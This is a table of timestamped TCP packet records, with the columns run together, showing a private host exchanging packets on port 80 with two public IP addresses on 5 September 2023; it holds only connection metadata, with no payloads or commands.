                                                                                                                                                    Sep 5, 2023 13:02:47.918689966 CEST4976580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:02:47.921063900 CEST4976580192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:03.271565914 CEST4976680192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:03.400029898 CEST8049766172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:03.400324106 CEST4976680192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:03.401012897 CEST4976680192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:03.403244972 CEST4976680192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:03.529614925 CEST8049766172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:03.531574965 CEST8049766172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:03.799978018 CEST8049766172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:03.800081968 CEST8049766172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:03.800251961 CEST4976680192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:03.802891970 CEST4976680192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:04.002573013 CEST4976780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:04.132824898 CEST8049767172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:04.132939100 CEST4976780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:04.133225918 CEST4976780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:04.133985043 CEST4976780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:04.261841059 CEST8049767172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:04.262471914 CEST8049767172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:04.532296896 CEST8049767172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:04.532325983 CEST8049767172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:04.532474041 CEST4976780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:04.667124987 CEST4976780192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:04.857866049 CEST4976880192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:04.986463070 CEST8049768104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:04.986664057 CEST4976880192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:04.987086058 CEST4976880192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:04.988643885 CEST4976880192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:05.115679026 CEST8049768104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:05.117221117 CEST8049768104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:05.386718988 CEST8049768104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:05.386756897 CEST8049768104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:05.386964083 CEST4976880192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:05.390841961 CEST4976880192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:05.884090900 CEST4976980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:06.016777039 CEST8049769172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:06.016920090 CEST4976980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:06.024326086 CEST4976980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:06.025150061 CEST4976980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:06.157506943 CEST8049769172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:06.157568932 CEST8049769172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:06.424838066 CEST8049769172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:06.424885035 CEST8049769172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:06.425035954 CEST4976980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:06.427010059 CEST4976980192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:07.721569061 CEST4977080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:07.853301048 CEST8049770104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:07.853552103 CEST4977080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:07.853878021 CEST4977080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:07.854650021 CEST4977080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:07.982429028 CEST8049770104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:07.983125925 CEST8049770104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:08.239799976 CEST8049770104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:08.239861965 CEST8049770104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:08.240101099 CEST4977080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:08.246251106 CEST4977080192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:08.430634975 CEST4977180192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:08.559283018 CEST8049771104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:08.559570074 CEST4977180192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:08.559906006 CEST4977180192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:08.560960054 CEST4977180192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:08.691921949 CEST8049771104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:08.691977978 CEST8049771104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:08.966351986 CEST8049771104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:08.966384888 CEST8049771104.21.60.111192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:08.966568947 CEST4977180192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:08.968573093 CEST4977180192.168.2.4104.21.60.111
                                                                                                                                                    Sep 5, 2023 13:03:09.127379894 CEST4977280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:09.256328106 CEST8049772172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:09.256556988 CEST4977280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:09.257374048 CEST4977280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:09.259506941 CEST4977280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:09.385956049 CEST8049772172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:09.388026953 CEST8049772172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:09.704988956 CEST8049772172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:09.705065012 CEST8049772172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:09.705324888 CEST4977280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:09.710596085 CEST4977280192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.481153965 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.609560966 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.610208988 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.610208988 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.612934113 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.738748074 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.738908052 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.741233110 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.741369963 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.741422892 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.741455078 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.741487026 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.741517067 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.741532087 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.741549969 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.741616964 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.741657972 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.741671085 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.741765976 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.867362022 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.867651939 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.869704962 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.869729042 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.869884014 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.869885921 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.869908094 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.869925976 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.869939089 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.869956970 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.869887114 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.870078087 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.870078087 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.870078087 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.870111942 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.870131016 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.870150089 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.870294094 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.870294094 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.870321035 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.870354891 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.870354891 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.870419025 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.910973072 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.911180973 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:10.998414993 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:10.998737097 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.000624895 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.000777960 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.000797987 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.000813961 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.000821114 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.000835896 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.000973940 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.000974894 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.000988007 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.000998020 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001019001 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.001199961 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.001386881 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001401901 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001415968 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001576900 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.001615047 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001631975 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001638889 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001646996 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001655102 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001662970 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001671076 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001683950 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001692057 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001828909 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001843929 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.001864910 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.001930952 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.001971960 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.002032042 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.039292097 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.039392948 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.039567947 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.039567947 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.129621029 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.129647970 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.129853964 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.131680965 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131699085 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131712914 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131721020 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131736994 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131752014 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131767035 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131783962 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131799936 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131814957 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131829977 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131835938 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.131838083 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131917000 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.131966114 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131966114 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.131980896 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.131995916 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132004976 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.132009983 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132025957 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132038116 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132052898 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132066011 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132081032 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132105112 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.132147074 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.132193089 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.132245064 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132334948 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.132508993 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132522106 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132535934 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132544041 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132551908 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132679939 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.132735968 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.132813931 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132827044 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132841110 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.132951021 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.132951021 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.133143902 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133157969 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133171082 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133177996 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133193016 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133207083 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133220911 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133235931 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133249998 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133265018 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133280039 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133289099 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133289099 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.133302927 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133317947 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133333921 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133348942 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133363962 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133363962 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.133378983 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133394003 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133409977 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.133450031 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.133522987 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.133572102 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.170461893 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.170515060 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.170547962 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.170659065 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.170777082 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.260152102 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.260199070 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.260340929 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.260451078 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.260551929 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.260730028 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.260818005 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.260855913 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.261002064 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.262058020 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.262192011 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263196945 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263237953 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263269901 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263294935 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263300896 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263330936 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263334036 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263365984 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263365984 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263380051 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263416052 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263451099 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263474941 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263474941 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263514996 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263525963 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263571024 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263566971 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263621092 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263665915 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263669014 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263665915 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263703108 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263715029 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263703108 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263794899 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263796091 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.263840914 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263875008 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263921022 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.263966084 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264003038 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264003038 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264013052 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264051914 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264051914 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264059067 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264105082 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264108896 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264153957 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264178991 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264178991 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264202118 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264247894 CEST8049773172.67.195.229192.168.2.4
                                                                                                                                                    Sep 5, 2023 13:03:11.264281034 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264281034 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264281034 CEST4977380192.168.2.4172.67.195.229
                                                                                                                                                    Sep 5, 2023 13:03:11.264288902 CEST8049773172.67.195.229192.168.2.4
